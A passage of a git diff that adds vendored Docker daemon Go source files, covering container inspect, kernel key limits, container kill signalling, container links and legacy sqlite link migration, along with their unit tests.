+		MemorySwap:      container.HostConfig.MemorySwap,
+		CPUShares:       container.HostConfig.CPUShares,
+		CPUSet:          container.HostConfig.CpusetCpus,
+	}
+	networkSettings := daemon.getBackwardsCompatibleNetworkSettings(container.NetworkSettings)
+
+	return &v1p19.ContainerJSON{
+		ContainerJSONBase: base,
+		Volumes:           volumes,
+		VolumesRW:         volumesRW,
+		Config:            config,
+		NetworkSettings:   networkSettings,
+	}, nil
+}
+
+func addMountPoints(container *container.Container) []types.MountPoint {
+	mountPoints := make([]types.MountPoint, 0, len(container.MountPoints))
+	for _, m := range container.MountPoints {
+		mountPoints = append(mountPoints, types.MountPoint{
+			Type:        m.Type,
+			Name:        m.Name,
+			Source:      m.Path(),
+			Destination: m.Destination,
+			Driver:      m.Driver,
+			Mode:        m.Mode,
+			RW:          m.RW,
+			Propagation: m.Propagation,
+		})
+	}
+	return mountPoints
+}
+
+func inspectExecProcessConfig(e *exec.Config) *backend.ExecProcessConfig {
+	return &backend.ExecProcessConfig{
+		Tty:        e.Tty,
+		Entrypoint: e.Entrypoint,
+		Arguments:  e.Args,
+		Privileged: &e.Privileged,
+		User:       e.User,
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/inspect_windows.go b/vendor/github.com/docker/docker/daemon/inspect_windows.go
new file mode 100644
index 0000000000..b331c83ca3
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/inspect_windows.go
@@ -0,0 +1,41 @@
+package daemon
+
+import (
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/exec"
+)
+
+// This sets platform-specific fields
+func setPlatformSpecificContainerFields(container *container.Container, contJSONBase *types.ContainerJSONBase) *types.ContainerJSONBase {
+	return contJSONBase
+}
+
+func addMountPoints(container *container.Container) []types.MountPoint {
+	mountPoints := make([]types.MountPoint, 0, len(container.MountPoints))
+	for _, m := range container.MountPoints {
+		mountPoints = append(mountPoints, types.MountPoint{
+			Type:        m.Type,
+			Name:        m.Name,
+			Source:      m.Path(),
+			Destination: m.Destination,
+			Driver:      m.Driver,
+			RW:          m.RW,
+		})
+	}
+	return mountPoints
+}
+
+// containerInspectPre120 get containers for pre 1.20 APIs.
+func (daemon *Daemon) containerInspectPre120(name string) (*types.ContainerJSON, error) {
+	return daemon.ContainerInspectCurrent(name, false)
+}
+
+func inspectExecProcessConfig(e *exec.Config) *backend.ExecProcessConfig {
+	return &backend.ExecProcessConfig{
+		Tty:        e.Tty,
+		Entrypoint: e.Entrypoint,
+		Arguments:  e.Args,
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/keys.go b/vendor/github.com/docker/docker/daemon/keys.go
new file mode 100644
index 0000000000..055d488a5d
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/keys.go
@@ -0,0 +1,59 @@
+// +build linux
+
+package daemon
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"strconv"
+	"strings"
+)
+
+const (
+	rootKeyFile   = "/proc/sys/kernel/keys/root_maxkeys"
+	rootBytesFile = "/proc/sys/kernel/keys/root_maxbytes"
+	rootKeyLimit  = 1000000
+	// it is standard configuration to allocate 25 bytes per key
+	rootKeyByteMultiplier = 25
+)
+
+// ModifyRootKeyLimit checks to see if the root key limit is set to
+// at least 1000000 and changes it to that limit along with the maxbytes
+// allocated to the keys at a 25 to 1 multiplier.
+func ModifyRootKeyLimit() error {
+	value, err := readRootKeyLimit(rootKeyFile)
+	if err != nil {
+		return err
+	}
+	if value < rootKeyLimit {
+		return setRootKeyLimit(rootKeyLimit)
+	}
+	return nil
+}
+
+func setRootKeyLimit(limit int) error {
+	keys, err := os.OpenFile(rootKeyFile, os.O_WRONLY, 0)
+	if err != nil {
+		return err
+	}
+	defer keys.Close()
+	if _, err := fmt.Fprintf(keys, "%d", limit); err != nil {
+		return err
+	}
+	bytes, err := os.OpenFile(rootBytesFile, os.O_WRONLY, 0)
+	if err != nil {
+		return err
+	}
+	defer bytes.Close()
+	_, err = fmt.Fprintf(bytes, "%d", limit*rootKeyByteMultiplier)
+	return err
+}
+
+func readRootKeyLimit(path string) (int, error) {
+	data, err := ioutil.ReadFile(path)
+	if err != nil {
+		return -1, err
+	}
+	return strconv.Atoi(strings.Trim(string(data), "\n"))
+}
diff --git a/vendor/github.com/docker/docker/daemon/keys_unsupported.go b/vendor/github.com/docker/docker/daemon/keys_unsupported.go
new file mode 100644
index 0000000000..b17255940a
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/keys_unsupported.go
@@ -0,0 +1,8 @@
+// +build !linux
+
+package daemon
+
+// ModifyRootKeyLimit is an noop on unsupported platforms.
+func ModifyRootKeyLimit() error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/kill.go b/vendor/github.com/docker/docker/daemon/kill.go
new file mode 100644
index 0000000000..18d5bbb4e5
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/kill.go
@@ -0,0 +1,164 @@
+package daemon
+
+import (
+	"fmt"
+	"runtime"
+	"strings"
+	"syscall"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/pkg/signal"
+)
+
+type errNoSuchProcess struct {
+	pid    int
+	signal int
+}
+
+func (e errNoSuchProcess) Error() string {
+	return fmt.Sprintf("Cannot kill process (pid=%d) with signal %d: no such process.", e.pid, e.signal)
+}
+
+// isErrNoSuchProcess returns true if the error
+// is an instance of errNoSuchProcess.
+func isErrNoSuchProcess(err error) bool {
+	_, ok := err.(errNoSuchProcess)
+	return ok
+}
+
+// ContainerKill sends signal to the container
+// If no signal is given (sig 0), then Kill with SIGKILL and wait
+// for the container to exit.
+// If a signal is given, then just send it to the container and return.
+func (daemon *Daemon) ContainerKill(name string, sig uint64) error {
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return err
+	}
+
+	if sig != 0 && !signal.ValidSignalForPlatform(syscall.Signal(sig)) {
+		return fmt.Errorf("The %s daemon does not support signal %d", runtime.GOOS, sig)
+	}
+
+	// If no signal is passed, or SIGKILL, perform regular Kill (SIGKILL + wait())
+	if sig == 0 || syscall.Signal(sig) == syscall.SIGKILL {
+		return daemon.Kill(container)
+	}
+	return daemon.killWithSignal(container, int(sig))
+}
+
+// killWithSignal sends the container the given signal. This wrapper for the
+// host specific kill command prepares the container before attempting
+// to send the signal. An error is returned if the container is paused
+// or not running, or if there is a problem returned from the
+// underlying kill command.
+func (daemon *Daemon) killWithSignal(container *container.Container, sig int) error {
+	logrus.Debugf("Sending kill signal %d to container %s", sig, container.ID)
+	container.Lock()
+	defer container.Unlock()
+
+	// We could unpause the container for them rather than returning this error
+	if container.Paused {
+		return fmt.Errorf("Container %s is paused. Unpause the container before stopping", container.ID)
+	}
+
+	if !container.Running {
+		return errNotRunning{container.ID}
+	}
+
+	if container.Config.StopSignal != "" {
+		containerStopSignal, err := signal.ParseSignal(container.Config.StopSignal)
+		if err != nil {
+			return err
+		}
+		if containerStopSignal == syscall.Signal(sig) {
+			container.ExitOnNext()
+		}
+	} else {
+		container.ExitOnNext()
+	}
+
+	if !daemon.IsShuttingDown() {
+		container.HasBeenManuallyStopped = true
+	}
+
+	// if the container is currently restarting we do not need to send the signal
+	// to the process. Telling the monitor that it should exit on its next event
+	// loop is enough
+	if container.Restarting {
+		return nil
+	}
+
+	if err := daemon.kill(container, sig); err != nil {
+		err = fmt.Errorf("Cannot kill container %s: %s", container.ID, err)
+		// if container or process not exists, ignore the error
+		if strings.Contains(err.Error(), "container not found") ||
+			strings.Contains(err.Error(), "no such process") {
+			logrus.Warnf("container kill failed because of 'container not found' or 'no such process': %s", err.Error())
+		} else {
+			return err
+		}
+	}
+
+	attributes := map[string]string{
+		"signal": fmt.Sprintf("%d", sig),
+	}
+	daemon.LogContainerEventWithAttributes(container, "kill", attributes)
+	return nil
+}
+
+// Kill forcefully terminates a container.
+func (daemon *Daemon) Kill(container *container.Container) error {
+	if !container.IsRunning() {
+		return errNotRunning{container.ID}
+	}
+
+	// 1. Send SIGKILL
+	if err := daemon.killPossiblyDeadProcess(container, int(syscall.SIGKILL)); err != nil {
+		// While normally we might "return err" here we're not going to
+		// because if we can't stop the container by this point then
+		// its probably because its already stopped. Meaning, between
+		// the time of the IsRunning() call above and now it stopped.
+		// Also, since the err return will be environment specific we can't
+		// look for any particular (common) error that would indicate
+		// that the process is already dead vs something else going wrong.
+		// So, instead we'll give it up to 2 more seconds to complete and if
+		// by that time the container is still running, then the error
+		// we got is probably valid and so we return it to the caller.
+		if isErrNoSuchProcess(err) {
+			return nil
+		}
+
+		if _, err2 := container.WaitStop(2 * time.Second); err2 != nil {
+			return err
+		}
+	}
+
+	// 2. Wait for the process to die, in last resort, try to kill the process directly
+	if err := killProcessDirectly(container); err != nil {
+		if isErrNoSuchProcess(err) {
+			return nil
+		}
+		return err
+	}
+
+	container.WaitStop(-1 * time.Second)
+	return nil
+}
+
+// killPossibleDeadProcess is a wrapper around killSig() suppressing "no such process" error.
+func (daemon *Daemon) killPossiblyDeadProcess(container *container.Container, sig int) error {
+	err := daemon.killWithSignal(container, sig)
+	if err == syscall.ESRCH {
+		e := errNoSuchProcess{container.GetPID(), sig}
+		logrus.Debug(e)
+		return e
+	}
+	return err
+}
+
+func (daemon *Daemon) kill(c *container.Container, sig int) error {
+	return daemon.containerd.Signal(c.ID, sig)
+}
diff --git a/vendor/github.com/docker/docker/daemon/links.go b/vendor/github.com/docker/docker/daemon/links.go
new file mode 100644
index 0000000000..7f691d4f16
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/links.go
@@ -0,0 +1,87 @@
+package daemon
+
+import (
+	"sync"
+
+	"github.com/docker/docker/container"
+)
+
+// linkIndex stores link relationships between containers, including their specified alias
+// The alias is the name the parent uses to reference the child
+type linkIndex struct {
+	// idx maps a parent->alias->child relationship
+	idx map[*container.Container]map[string]*container.Container
+	// childIdx maps  child->parent->aliases
+	childIdx map[*container.Container]map[*container.Container]map[string]struct{}
+	mu       sync.Mutex
+}
+
+func newLinkIndex() *linkIndex {
+	return &linkIndex{
+		idx:      make(map[*container.Container]map[string]*container.Container),
+		childIdx: make(map[*container.Container]map[*container.Container]map[string]struct{}),
+	}
+}
+
+// link adds indexes for the passed in parent/child/alias relationships
+func (l *linkIndex) link(parent, child *container.Container, alias string) {
+	l.mu.Lock()
+
+	if l.idx[parent] == nil {
+		l.idx[parent] = make(map[string]*container.Container)
+	}
+	l.idx[parent][alias] = child
+	if l.childIdx[child] == nil {
+		l.childIdx[child] = make(map[*container.Container]map[string]struct{})
+	}
+	if l.childIdx[child][parent] == nil {
+		l.childIdx[child][parent] = make(map[string]struct{})
+	}
+	l.childIdx[child][parent][alias] = struct{}{}
+
+	l.mu.Unlock()
+}
+
+// unlink removes the requested alias for the given parent/child
+func (l *linkIndex) unlink(alias string, child, parent *container.Container) {
+	l.mu.Lock()
+	delete(l.idx[parent], alias)
+	delete(l.childIdx[child], parent)
+	l.mu.Unlock()
+}
+
+// children maps all the aliases-> children for the passed in parent
+// aliases here are the aliases the parent uses to refer to the child
+func (l *linkIndex) children(parent *container.Container) map[string]*container.Container {
+	l.mu.Lock()
+	children := l.idx[parent]
+	l.mu.Unlock()
+	return children
+}
+
+// parents maps all the aliases->parent for the passed in child
+// aliases here are the aliases the parents use to refer to the child
+func (l *linkIndex) parents(child *container.Container) map[string]*container.Container {
+	l.mu.Lock()
+
+	parents := make(map[string]*container.Container)
+	for parent, aliases := range l.childIdx[child] {
+		for alias := range aliases {
+			parents[alias] = parent
+		}
+	}
+
+	l.mu.Unlock()
+	return parents
+}
+
+// delete deletes all link relationships referencing this container
+func (l *linkIndex) delete(container *container.Container) {
+	l.mu.Lock()
+	for _, child := range l.idx[container] {
+		delete(l.childIdx[child], container)
+	}
+	delete(l.idx, container)
+	delete(l.childIdx, container)
+	l.mu.Unlock()
+}
diff --git a/vendor/github.com/docker/docker/daemon/links/links.go b/vendor/github.com/docker/docker/daemon/links/links.go
new file mode 100644
index 0000000000..af15de046d
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/links/links.go
@@ -0,0 +1,141 @@
+package links
+
+import (
+	"fmt"
+	"path"
+	"strings"
+
+	"github.com/docker/go-connections/nat"
+)
+
+// Link struct holds informations about parent/child linked container
+type Link struct {
+	// Parent container IP address
+	ParentIP string
+	// Child container IP address
+	ChildIP string
+	// Link name
+	Name string
+	// Child environments variables
+	ChildEnvironment []string
+	// Child exposed ports
+	Ports []nat.Port
+}
+
+// NewLink initializes a new Link struct with the provided options.
+func NewLink(parentIP, childIP, name string, env []string, exposedPorts map[nat.Port]struct{}) *Link {
+	var (
+		i     int
+		ports = make([]nat.Port, len(exposedPorts))
+	)
+
+	for p := range exposedPorts {
+		ports[i] = p
+		i++
+	}
+
+	return &Link{
+		Name:             name,
+		ChildIP:          childIP,
+		ParentIP:         parentIP,
+		ChildEnvironment: env,
+		Ports:            ports,
+	}
+}
+
+// ToEnv creates a string's slice containing child container informations in
+// the form of environment variables which will be later exported on container
+// startup.
+func (l *Link) ToEnv() []string {
+	env := []string{}
+
+	_, n := path.Split(l.Name)
+	alias := strings.Replace(strings.ToUpper(n), "-", "_", -1)
+
+	if p := l.getDefaultPort(); p != nil {
+		env = append(env, fmt.Sprintf("%s_PORT=%s://%s:%s", alias, p.Proto(), l.ChildIP, p.Port()))
+	}
+
+	//sort the ports so that we can bulk the continuous ports together
+	nat.Sort(l.Ports, func(ip, jp nat.Port) bool {
+		// If the two ports have the same number, tcp takes priority
+		// Sort in desc order
+		return ip.Int() < jp.Int() || (ip.Int() == jp.Int() && strings.ToLower(ip.Proto()) == "tcp")
+	})
+
+	for i := 0; i < len(l.Ports); {
+		p := l.Ports[i]
+		j := nextContiguous(l.Ports, p.Int(), i)
+		if j > i+1 {
+			env = append(env, fmt.Sprintf("%s_PORT_%s_%s_START=%s://%s:%s", alias, p.Port(), strings.ToUpper(p.Proto()), p.Proto(), l.ChildIP, p.Port()))
+			env = append(env, fmt.Sprintf("%s_PORT_%s_%s_ADDR=%s", alias, p.Port(), strings.ToUpper(p.Proto()), l.ChildIP))
+			env = append(env, fmt.Sprintf("%s_PORT_%s_%s_PROTO=%s", alias, p.Port(), strings.ToUpper(p.Proto()), p.Proto()))
+			env = append(env, fmt.Sprintf("%s_PORT_%s_%s_PORT_START=%s", alias, p.Port(), strings.ToUpper(p.Proto()), p.Port()))
+
+			q := l.Ports[j]
+			env = append(env, fmt.Sprintf("%s_PORT_%s_%s_END=%s://%s:%s", alias, p.Port(), strings.ToUpper(q.Proto()), q.Proto(), l.ChildIP, q.Port()))
+			env = append(env, fmt.Sprintf("%s_PORT_%s_%s_PORT_END=%s", alias, p.Port(), strings.ToUpper(q.Proto()), q.Port()))
+
+			i = j + 1
+			continue
+		} else {
+			i++
+		}
+	}
+	for _, p := range l.Ports {
+		env = append(env, fmt.Sprintf("%s_PORT_%s_%s=%s://%s:%s", alias, p.Port(), strings.ToUpper(p.Proto()), p.Proto(), l.ChildIP, p.Port()))
+		env = append(env, fmt.Sprintf("%s_PORT_%s_%s_ADDR=%s", alias, p.Port(), strings.ToUpper(p.Proto()), l.ChildIP))
+		env = append(env, fmt.Sprintf("%s_PORT_%s_%s_PORT=%s", alias, p.Port(), strings.ToUpper(p.Proto()), p.Port()))
+		env = append(env, fmt.Sprintf("%s_PORT_%s_%s_PROTO=%s", alias, p.Port(), strings.ToUpper(p.Proto()), p.Proto()))
+	}
+
+	// Load the linked container's name into the environment
+	env = append(env, fmt.Sprintf("%s_NAME=%s", alias, l.Name))
+
+	if l.ChildEnvironment != nil {
+		for _, v := range l.ChildEnvironment {
+			parts := strings.SplitN(v, "=", 2)
+			if len(parts) < 2 {
+				continue
+			}
+			// Ignore a few variables that are added during docker build (and not really relevant to linked containers)
+			if parts[0] == "HOME" || parts[0] == "PATH" {
+				continue
+			}
+			env = append(env, fmt.Sprintf("%s_ENV_%s=%s", alias, parts[0], parts[1]))
+		}
+	}
+	return env
+}
+
+func nextContiguous(ports []nat.Port, value int, index int) int {
+	if index+1 == len(ports) {
+		return index
+	}
+	for i := index + 1; i < len(ports); i++ {
+		if ports[i].Int() > value+1 {
+			return i - 1
+		}
+
+		value++
+	}
+	return len(ports) - 1
+}
+
+// Default port rules
+func (l *Link) getDefaultPort() *nat.Port {
+	var p nat.Port
+	i := len(l.Ports)
+
+	if i == 0 {
+		return nil
+	} else if i > 1 {
+		nat.Sort(l.Ports, func(ip, jp nat.Port) bool {
+			// If the two ports have the same number, tcp takes priority
+			// Sort in desc order
+			return ip.Int() < jp.Int() || (ip.Int() == jp.Int() && strings.ToLower(ip.Proto()) == "tcp")
+		})
+	}
+	p = l.Ports[0]
+	return &p
+}
diff --git a/vendor/github.com/docker/docker/daemon/links/links_test.go b/vendor/github.com/docker/docker/daemon/links/links_test.go
new file mode 100644
index 0000000000..0273f13cf0
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/links/links_test.go
@@ -0,0 +1,213 @@
+package links
+
+import (
+	"fmt"
+	"strings"
+	"testing"
+
+	"github.com/docker/go-connections/nat"
+)
+
+// Just to make life easier
+func newPortNoError(proto, port string) nat.Port {
+	p, _ := nat.NewPort(proto, port)
+	return p
+}
+
+func TestLinkNaming(t *testing.T) {
+	ports := make(nat.PortSet)
+	ports[newPortNoError("tcp", "6379")] = struct{}{}
+
+	link := NewLink("172.0.17.3", "172.0.17.2", "/db/docker-1", nil, ports)
+
+	rawEnv := link.ToEnv()
+	env := make(map[string]string, len(rawEnv))
+	for _, e := range rawEnv {
+		parts := strings.Split(e, "=")
+		if len(parts) != 2 {
+			t.FailNow()
+		}
+		env[parts[0]] = parts[1]
+	}
+
+	value, ok := env["DOCKER_1_PORT"]
+
+	if !ok {
+		t.Fatalf("DOCKER_1_PORT not found in env")
+	}
+
+	if value != "tcp://172.0.17.2:6379" {
+		t.Fatalf("Expected 172.0.17.2:6379, got %s", env["DOCKER_1_PORT"])
+	}
+}
+
+func TestLinkNew(t *testing.T) {
+	ports := make(nat.PortSet)
+	ports[newPortNoError("tcp", "6379")] = struct{}{}
+
+	link := NewLink("172.0.17.3", "172.0.17.2", "/db/docker", nil, ports)
+
+	if link.Name != "/db/docker" {
+		t.Fail()
+	}
+	if link.ParentIP != "172.0.17.3" {
+		t.Fail()
+	}
+	if link.ChildIP != "172.0.17.2" {
+		t.Fail()
+	}
+	for _, p := range link.Ports {
+		if p != newPortNoError("tcp", "6379") {
+			t.Fail()
+		}
+	}
+}
+
+func TestLinkEnv(t *testing.T) {
+	ports := make(nat.PortSet)
+	ports[newPortNoError("tcp", "6379")] = struct{}{}
+
+	link := NewLink("172.0.17.3", "172.0.17.2", "/db/docker", []string{"PASSWORD=gordon"}, ports)
+
+	rawEnv := link.ToEnv()
+	env := make(map[string]string, len(rawEnv))
+	for _, e := range rawEnv {
+		parts := strings.Split(e, "=")
+		if len(parts) != 2 {
+			t.FailNow()
+		}
+		env[parts[0]] = parts[1]
+	}
+	if env["DOCKER_PORT"] != "tcp://172.0.17.2:6379" {
+		t.Fatalf("Expected 172.0.17.2:6379, got %s", env["DOCKER_PORT"])
+	}
+	if env["DOCKER_PORT_6379_TCP"] != "tcp://172.0.17.2:6379" {
+		t.Fatalf("Expected tcp://172.0.17.2:6379, got %s", env["DOCKER_PORT_6379_TCP"])
+	}
+	if env["DOCKER_PORT_6379_TCP_PROTO"] != "tcp" {
+		t.Fatalf("Expected tcp, got %s", env["DOCKER_PORT_6379_TCP_PROTO"])
+	}
+	if env["DOCKER_PORT_6379_TCP_ADDR"] != "172.0.17.2" {
+		t.Fatalf("Expected 172.0.17.2, got %s", env["DOCKER_PORT_6379_TCP_ADDR"])
+	}
+	if env["DOCKER_PORT_6379_TCP_PORT"] != "6379" {
+		t.Fatalf("Expected 6379, got %s", env["DOCKER_PORT_6379_TCP_PORT"])
+	}
+	if env["DOCKER_NAME"] != "/db/docker" {
+		t.Fatalf("Expected /db/docker, got %s", env["DOCKER_NAME"])
+	}
+	if env["DOCKER_ENV_PASSWORD"] != "gordon" {
+		t.Fatalf("Expected gordon, got %s", env["DOCKER_ENV_PASSWORD"])
+	}
+}
+
+func TestLinkMultipleEnv(t *testing.T) {
+	ports := make(nat.PortSet)
+	ports[newPortNoError("tcp", "6379")] = struct{}{}
+	ports[newPortNoError("tcp", "6380")] = struct{}{}
+	ports[newPortNoError("tcp", "6381")] = struct{}{}
+
+	link := NewLink("172.0.17.3", "172.0.17.2", "/db/docker", []string{"PASSWORD=gordon"}, ports)
+
+	rawEnv := link.ToEnv()
+	env := make(map[string]string, len(rawEnv))
+	for _, e := range rawEnv {
+		parts := strings.Split(e, "=")
+		if len(parts) != 2 {
+			t.FailNow()
+		}
+		env[parts[0]] = parts[1]
+	}
+	if env["DOCKER_PORT"] != "tcp://172.0.17.2:6379" {
+		t.Fatalf("Expected 172.0.17.2:6379, got %s", env["DOCKER_PORT"])
+	}
+	if env["DOCKER_PORT_6379_TCP_START"] != "tcp://172.0.17.2:6379" {
+		t.Fatalf("Expected tcp://172.0.17.2:6379, got %s", env["DOCKER_PORT_6379_TCP_START"])
+	}
+	if env["DOCKER_PORT_6379_TCP_END"] != "tcp://172.0.17.2:6381" {
+		t.Fatalf("Expected tcp://172.0.17.2:6381, got %s", env["DOCKER_PORT_6379_TCP_END"])
+	}
+	if env["DOCKER_PORT_6379_TCP_PROTO"] != "tcp" {
+		t.Fatalf("Expected tcp, got %s", env["DOCKER_PORT_6379_TCP_PROTO"])
+	}
+	if env["DOCKER_PORT_6379_TCP_ADDR"] != "172.0.17.2" {
+		t.Fatalf("Expected 172.0.17.2, got %s", env["DOCKER_PORT_6379_TCP_ADDR"])
+	}
+	if env["DOCKER_PORT_6379_TCP_PORT_START"] != "6379" {
+		t.Fatalf("Expected 6379, got %s", env["DOCKER_PORT_6379_TCP_PORT_START"])
+	}
+	if env["DOCKER_PORT_6379_TCP_PORT_END"] != "6381" {
+		t.Fatalf("Expected 6381, got %s", env["DOCKER_PORT_6379_TCP_PORT_END"])
+	}
+	if env["DOCKER_NAME"] != "/db/docker" {
+		t.Fatalf("Expected /db/docker, got %s", env["DOCKER_NAME"])
+	}
+	if env["DOCKER_ENV_PASSWORD"] != "gordon" {
+		t.Fatalf("Expected gordon, got %s", env["DOCKER_ENV_PASSWORD"])
+	}
+}
+
+func TestLinkPortRangeEnv(t *testing.T) {
+	ports := make(nat.PortSet)
+	ports[newPortNoError("tcp", "6379")] = struct{}{}
+	ports[newPortNoError("tcp", "6380")] = struct{}{}
+	ports[newPortNoError("tcp", "6381")] = struct{}{}
+
+	link := NewLink("172.0.17.3", "172.0.17.2", "/db/docker", []string{"PASSWORD=gordon"}, ports)
+
+	rawEnv := link.ToEnv()
+	env := make(map[string]string, len(rawEnv))
+	for _, e := range rawEnv {
+		parts := strings.Split(e, "=")
+		if len(parts) != 2 {
+			t.FailNow()
+		}
+		env[parts[0]] = parts[1]
+	}
+
+	if env["DOCKER_PORT"] != "tcp://172.0.17.2:6379" {
+		t.Fatalf("Expected 172.0.17.2:6379, got %s", env["DOCKER_PORT"])
+	}
+	if env["DOCKER_PORT_6379_TCP_START"] != "tcp://172.0.17.2:6379" {
+		t.Fatalf("Expected tcp://172.0.17.2:6379, got %s", env["DOCKER_PORT_6379_TCP_START"])
+	}
+	if env["DOCKER_PORT_6379_TCP_END"] != "tcp://172.0.17.2:6381" {
+		t.Fatalf("Expected tcp://172.0.17.2:6381, got %s", env["DOCKER_PORT_6379_TCP_END"])
+	}
+	if env["DOCKER_PORT_6379_TCP_PROTO"] != "tcp" {
+		t.Fatalf("Expected tcp, got %s", env["DOCKER_PORT_6379_TCP_PROTO"])
+	}
+	if env["DOCKER_PORT_6379_TCP_ADDR"] != "172.0.17.2" {
+		t.Fatalf("Expected 172.0.17.2, got %s", env["DOCKER_PORT_6379_TCP_ADDR"])
+	}
+	if env["DOCKER_PORT_6379_TCP_PORT_START"] != "6379" {
+		t.Fatalf("Expected 6379, got %s", env["DOCKER_PORT_6379_TCP_PORT_START"])
+	}
+	if env["DOCKER_PORT_6379_TCP_PORT_END"] != "6381" {
+		t.Fatalf("Expected 6381, got %s", env["DOCKER_PORT_6379_TCP_PORT_END"])
+	}
+	if env["DOCKER_NAME"] != "/db/docker" {
+		t.Fatalf("Expected /db/docker, got %s", env["DOCKER_NAME"])
+	}
+	if env["DOCKER_ENV_PASSWORD"] != "gordon" {
+		t.Fatalf("Expected gordon, got %s", env["DOCKER_ENV_PASSWORD"])
+	}
+	for i := range []int{6379, 6380, 6381} {
+		tcpaddr := fmt.Sprintf("DOCKER_PORT_%d_TCP_ADDR", i)
+		tcpport := fmt.Sprintf("DOCKER_PORT_%d_TCP+PORT", i)
+		tcpproto := fmt.Sprintf("DOCKER_PORT_%d_TCP+PROTO", i)
+		tcp := fmt.Sprintf("DOCKER_PORT_%d_TCP", i)
+		if env[tcpaddr] == "172.0.17.2" {
+			t.Fatalf("Expected env %s  = 172.0.17.2, got %s", tcpaddr, env[tcpaddr])
+		}
+		if env[tcpport] == fmt.Sprintf("%d", i) {
+			t.Fatalf("Expected env %s  = %d, got %s", tcpport, i, env[tcpport])
+		}
+		if env[tcpproto] == "tcp" {
+			t.Fatalf("Expected env %s  = tcp, got %s", tcpproto, env[tcpproto])
+		}
+		if env[tcp] == fmt.Sprintf("tcp://172.0.17.2:%d", i) {
+			t.Fatalf("Expected env %s  = tcp://172.0.17.2:%d, got %s", tcp, i, env[tcp])
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/links_linux.go b/vendor/github.com/docker/docker/daemon/links_linux.go
new file mode 100644
index 0000000000..2ea40d9e51
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/links_linux.go
@@ -0,0 +1,72 @@
+package daemon
+
+import (
+	"fmt"
+	"path/filepath"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/pkg/graphdb"
+)
+
+// migrateLegacySqliteLinks migrates sqlite links to use links from HostConfig
+// when sqlite links were used, hostConfig.Links was set to nil
+func (daemon *Daemon) migrateLegacySqliteLinks(db *graphdb.Database, container *container.Container) error {
+	// if links is populated (or an empty slice), then this isn't using sqlite links and can be skipped
+	if container.HostConfig == nil || container.HostConfig.Links != nil {
+		return nil
+	}
+
+	logrus.Debugf("migrating legacy sqlite link info for container: %s", container.ID)
+
+	fullName := container.Name
+	if fullName[0] != '/' {
+		fullName = "/" + fullName
+	}
+
+	// don't use a nil slice, this ensures that the check above will skip once the migration has completed
+	links := []string{}
+	children, err := db.Children(fullName, 0)
+	if err != nil {
+		if !strings.Contains(err.Error(), "Cannot find child for") {
+			return err
+		}
+		// else continue... it's ok if we didn't find any children, it'll just be nil and we can continue the migration
+	}
+
+	for _, child := range children {
+		c, err := daemon.GetContainer(child.Entity.ID())
+		if err != nil {
+			return err
+		}
+
+		links = append(links, c.Name+":"+child.Edge.Name)
+	}
+
+	container.HostConfig.Links = links
+	return container.WriteHostConfig()
+}
+
+// sqliteMigration performs the link graph DB migration.
+func (daemon *Daemon) sqliteMigration(containers map[string]*container.Container) error {
+	// migrate any legacy links from sqlite
+	linkdbFile := filepath.Join(daemon.root, "linkgraph.db")
+	var (
+		legacyLinkDB *graphdb.Database
+		err          error
+	)
+
+	legacyLinkDB, err = graphdb.NewSqliteConn(linkdbFile)
+	if err != nil {
+		return fmt.Errorf("error connecting to legacy link graph DB %s, container links may be lost: %v", linkdbFile, err)
+	}
+	defer legacyLinkDB.Close()
+
+	for _, c := range containers {
+		if err := daemon.migrateLegacySqliteLinks(legacyLinkDB, c); err != nil {
+			return err
+		}
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/links_linux_test.go b/vendor/github.com/docker/docker/daemon/links_linux_test.go
new file mode 100644
index 0000000000..e2dbff2d25
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/links_linux_test.go
@@ -0,0 +1,98 @@
+package daemon
+
+import (
+	"encoding/json"
+	"io/ioutil"
+	"os"
+	"path"
+	"path/filepath"
+	"testing"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/pkg/graphdb"
+	"github.com/docker/docker/pkg/stringid"
+)
+
+func TestMigrateLegacySqliteLinks(t *testing.T) {
+	tmpDir, err := ioutil.TempDir("", "legacy-qlite-links-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpDir)
+
+	name1 := "test1"
+	c1 := &container.Container{
+		CommonContainer: container.CommonContainer{
+			ID:         stringid.GenerateNonCryptoID(),
+			Name:       name1,
+			HostConfig: &containertypes.HostConfig{},
+		},
+	}
+	c1.Root = tmpDir
+
+	name2 := "test2"
+	c2 := &container.Container{
+		CommonContainer: container.CommonContainer{
+			ID:   stringid.GenerateNonCryptoID(),
+			Name: name2,
+		},
+	}
+
+	store := container.NewMemoryStore()
+	store.Add(c1.ID, c1)
+	store.Add(c2.ID, c2)
+
+	d := &Daemon{root: tmpDir, containers: store}
+	db, err := graphdb.NewSqliteConn(filepath.Join(d.root, "linkgraph.db"))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := db.Set("/"+name1, c1.ID); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := db.Set("/"+name2, c2.ID); err != nil {
+		t.Fatal(err)
+	}
+
+	alias := "hello"
+	if _, err := db.Set(path.Join(c1.Name, alias), c2.ID); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := d.migrateLegacySqliteLinks(db, c1); err != nil {
+		t.Fatal(err)
+	}
+
+	if len(c1.HostConfig.Links) != 1 {
